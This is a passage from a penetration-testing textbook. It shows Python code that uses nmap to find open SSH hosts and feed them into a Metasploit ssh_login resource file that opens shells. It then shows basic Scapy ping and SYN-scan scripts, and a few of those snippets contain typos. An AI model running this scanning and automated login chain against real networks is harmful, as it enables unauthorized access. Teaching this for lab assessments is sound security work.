lookup for each host identified through the scan. For each of those hosts, it loads the interface dictionary and iterates through the key-and-value pairs.
The key holds the interface name, and the value is an embedded dictionary that holds the details for each of the values of that interface mapped to named keys, as shown in the previous ifacedetails.py
script. The value of the the 'addr'
key is compared with the host
from the scan. If the two match, then the host belongs to the assessor's box and not the organization being assessed. When this happens, the host value is set to None
and the target is not added to the ssh_hosts
file. There is a final check to verify that the port is actually an SSH port and that it is open. Then the value is written to the ssh_hosts
file and returned to the main function. The script does not block out the localhost IP address because we left it in for both testing and to highlight as a comparison, if you want to include this capability modifying this module:
def target_identifier(dir,user,passwd,ips,port_num,ifaces): bufsize = 0 ssh_hosts = "%s/ssh_hosts" % (dir) scanner = nmap.PortScanner() scanner.scan(ips, port_num) open(ssh_hosts, 'w').close() if scanner.all_hosts(): e = open(ssh_hosts, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None if host != None: home_dir="/root" ssh_hosts = "%s/ssh_hosts" % (home_dir) bufsize=0 e = open(ssh_hosts, 'a', bufsize) if 'ssh' in scanner[host]['tcp'][int(port_num)]['name']: if 'open' in scanner[host]['tcp'][int(port_num)]['state']: print("[+] Adding host %s to %s since the service is active on %s") % (host,ssh_hosts,port_num) hostdata=host + "\n" e.write(hostdata) if not scanner.all_hosts(): e.closed if ssh_hosts: return ssh_hosts
Now the script needs some default values set prior to execution. The easiest way to do this is to set them after the argument validator. Take a look at your script, eliminate the duplicates outside of functions (if there are any), and place the following code after the argument validator:
home_dir="/root" gateways = {} network_ifaces={}
One final change to the script is the inclusion of a test to see whether it was executed as a standalone script or it was an imported module. We have been executing these scripts natively without this, but it is best practice to include a simple check so that the script can be converted into a class. The only thing this check does is see whether the name of the module executed is main
, and if it is, it means that it was a standalone script. When this happens, it sets __name__
to '__main__'
, signifying the standalone script.
Look at the following code, which executes the relevant functions in order of necessity. This is done to identify the viable hosts to exploit and then pass the details to the resource file generator:
if __name__ == '__main__': gateways = get_gateways() network_ifaces = get_networks(gateways) hosts_file = target_identifier(home_dir,username, password,hosts,ports,network_ifaces) resource_file_builder(home_dir, username, password, hosts, ports, hosts_file)
You will often see on the Internet scripts that call a main()
function instead of a bunch of functions. This is functionally equivalent to what we are doing here, but you can create a main()
function above the if __name__ == '__main__':
that contains the preceding details, and then execute it as highlighted here:
if __name__ == '__main__': main()
With these minor changes, you can automatically generate resource files based on the results of a scan. Finally, change the script name to ssh_login.py
and then save and run it. When the script is run, it generates the code necessary for configuring and executing the exploit. Then you can run the resource file with the -r
option, as shown in the following screenshot. As you may have noticed, I did a test run that included my interface IP address to highlight the built-in error checking, and then executed the test against localhost. I verified that the resource file was created correctly and then ran it.

Once in the console, you can see that the resource file executed the attack on its own with the following results. The green +
sign means that a shell was opened on the Kali box.

Resource files can also be called from within Metasploit using the resource
command followed by the filename. This can be done for this attack with the following command resource ssh_login.rc
, which would have produced the same results. You can then see the interaction with the new session opened up by initiating an interaction with the new session using the session -i <session number>
command.
The following screenshot shows the validation of the username and hostname in the Kali instance:

Of course, you would not want to do this to your normal attack box, but it provides three key items, and they need to be foot stomped. Always change your default password; otherwise, you may be a victim, even during an engagement. Also change your Kali instance hostname to something defensive network tools will not pick up, and always test your exploits prior to usage.
Note
More details about the Python nmap library can be found at http://xael.org/norman/python/python-nmap/.
Now, with an understanding of nmap, nmap libraries, and the automated generation of Metasploit resource files, you are ready to start learning about scapy.
Note
This script can be found at https://raw.githubusercontent.com/funkandwagnalls/pythonpentest/master/ssh_login.py.
The Scapy library for Python
Welcome to Scapy, the Python library that is designed to manipulate, send, and read packets. Scapy is one of those tools that have a large amount of applicability, but it can seem complex to use. Before we set off, there are some basic rules to understand about Scapy that will make creating scripts much easier.
Firstly, refer to the previous sections to understand the TCP flags and how they are represented in Scapy. You will need to look at the flags mentioned earlier and their relevant positions to use them. Secondly, when Scapy receives responses for a packet sent, the flags are represented by binary bits in octal format within the 13th octet of a TCP header. So, you have to read the response based on this information.
Look at the following table, which represents the binary positional values of each flag as it is set:

So when you are reading the responses from the TCP packets and looking for a specific type of flag, you have to do the math. The preceding table will help simplify this for you, but keep in mind if you have ever played with or worked with tcpdump
that the material transmitted is identical. As an example, if you were looking for an SYN packet, you would see the value of the 13th octet as 2. If it was SYN + ACK, it would be a value of 18. Simply add the flag values together and you will have what you are looking for.
The next thing to keep in mind is that if you try to ping the loopback interface or localhost, the packet will not be assembled. This is because the kernel intercepts the request and processes it internally through the TCP/IP stack of the system. This is one of the errors that people get stuck with on with Scapy and often quit. So, instead of digging into fixing your packets so that they can hit your own Kali instance, spin up your Metasploitable instance or try and test your default gateway.
Tip
If you want to understand more about testing loopback interfaces or the localhost value, you can find the solution at http://www.secdev.org/projects/scapy/doc/troubleshooting.html.
Therefore, we are going to highlight testing a connection and then scanning a web port with Scapy. You have to understand that Scapy has multiple ways of sending and receiving packets, and depending on the data you want to extract, complex methods may not be necessary. First, look at what you are trying to accomplish. If you want to remain independent of the operating system, the two methods you should use are sr()
for layer 3 and srp()
for layer 2. Next, if the method has 1
after the function name but before the ()
sign, such as sr1()
, it means that it returns only the first answer. This can be plenty to achieve most results, but if there are multiple packets in a stream that need to be evaluated, you will want to forego these types of methods.
Next is the send()
method, which uses the operating system defaults for layer 2 and some operating system capabilities for layer 3 and above. Finally, there is sendp()
, which uses a custom layer 2 header. This can be created using the Ether()
method to represent the Ethernet frame header. This is extremely useful for wireless networks or locations where Virtual Local Area Networks (VLANs) are used to segment networks based on theoretical security. This is because wireless communication operates at layer 2, and VLANs are identified in this layer as well.
Note
Access Control Lists (ACL) based on VLANs are considered a cause of annoyance by most assessors, not security. This is because in most networks, you can easily hop network segments by manipulating the header of layer 2 frames. As you gain more experience, you will regularly see examples of this on live networks.
So, import the Scapy library and then set a variable with the destination IP address you want to ping. Create a packet that will contain the communication details and flags that you want sent to the target host. Then set a response variable to catch the results of the sr1()
function:
#!/usr/bin/env python try: from scapy.all import * except: sys.exit("[!] Install the scapy libraries with: pip install scapy") ip = "192.168.195.2" icmp = IP(dst=ip)/ICMP() resp = sr1(icmp, timout=10)

Now that you see that you got one answer, it means that the host is most likely up. You can validate it with the following test:
if resp == None: print("The host is down") else: print("The host is up")
When you test this, you can see that the results of the ping scan were successful, as follows:

We successfully pinged the host and validated the response variable by proving that it was not empty. From this, we can now check whether it has a web port open. To accomplish this, we will execute an SYN scan. Before doing this, however, understand that when you receive a response from the connection attempt, you receive both the answers and the unanswered data. So, the best thing to do is separate the two of them, and thanks to Scapy and Python syntax, this is extremely easy. You simply pass the response to two different variables, the first being the answers and the second being the unanswered, as shown here:
answers,unanswers = sr1(icmp, timout=10)
With this simple change, you now have the data returns cleaned up for easier manipulation. Furthermore, you can get summaries from these details by simply appending .summary()
to answers
or unanswers
. If you are iterating through a list of ports from 0
to 1024
, you can look at the specific results by a specific port by passing the value to the answers
variable by position in the list. So, if you want to see the results from a scan at port 80
for the answers, you can pass the value to the list like this: answers[80]
. This holds both sent and received packets for these answers, but these can further be split just like the previous example, as shown in this code:
sent, received = answers[80]
Keep in mind that this example only works for port 80
, as you designated the location you wanted to pull the data from. If you had not passed a positional value to the answers
variable, you would have put all the sent packets in the sent
variable and all the received packets in the received
variable.
Now that you have the basics listed, you can develop a packet, send it to a target, and receive the results. One thing to cover before moving forward is how easy it is to build a packet from the ground up, which involves building the IP header first and then the TCP header. Next, you pass the data to the scanner, which identifies the target as either alive or not. You can configure it so that there is no timeout value, but I highly discourage this as you may have to wait forever with no return. The following script was run to identify the 192.168.195.1
host and determine whether a web port was open:
#!/usr/bin/env python from scapy.all import * ip = "192.168.195.1" dst_port = 80 headers=IP(dst=ip)/TCP(dport=dst_port, flags="S") answers,unanswers=sr(headers,timeout=10)
As you can see in the following screenshot, the system responded with an answer. The preceding script can run standalone, or you can use the interactive interpreter to execute each line, as shown here:

Now the details can be extracted from the answers
variable. Remember that this is a list, so you should increment each of the values. The first packet sent would be represented by position 0, so each location after that represents the IP packets received after the original:
for a in answers: print(a[1][1].flags)
Here is what the catch is, though each value in the list is actually another list with more data in it. In Python, we call this a matrix, but do not fret! It is pretty easy to navigate. First, remember that we used the sr()
function, so this means that the results will be from layer 3 and above. Each embedded list is for the protocol above it; in this case, it will be TCP. We performed a SYN scan, so we are looking for a SYN + ACK response. Look at the preceding section to compute the value you are looking for. As you can see by referencing the preceding section related to TCP flags, the value you are looking for in header is 18 to verify a SYN + ACK response, which can be calculated by adding the positional value of ACK = 16
and the positional value of SYN = 2
. The following screenshot shows the actual result, which shows that the port is open. Understanding these concepts will allow you to use Scapy in future scripts.

You now have a basic understanding of Scapy, but don't worry! You are not done with it yet. Scapy has a significant amount of capability, which we have only touched on, and it provides you with the means to not only execute simple scans, but also manipulate network traffic. Many embedded devices and Industrial Control Systems (ICS) use unique communication forms to provide command and control for other units. At other times, you will realize that you need to identify live devices when nmap is being blocked. Scapy can help you fulfill all of these tasks.
Summary
In this chapter, a lot of details about identifying live hosts on the network, viable targets, and the different communication models were covered. To facilitate your understanding of the protocols and how they communicate, we discussed their different forms at the packet and frame levels. This chapter culminated with the automated exploitation of hosts using the Python nmap
and Scapy
libraries supporting the target identification. In the next chapter, we will build on these concepts to see how to exploit services with dictionary, brute-force, and password spray attacks.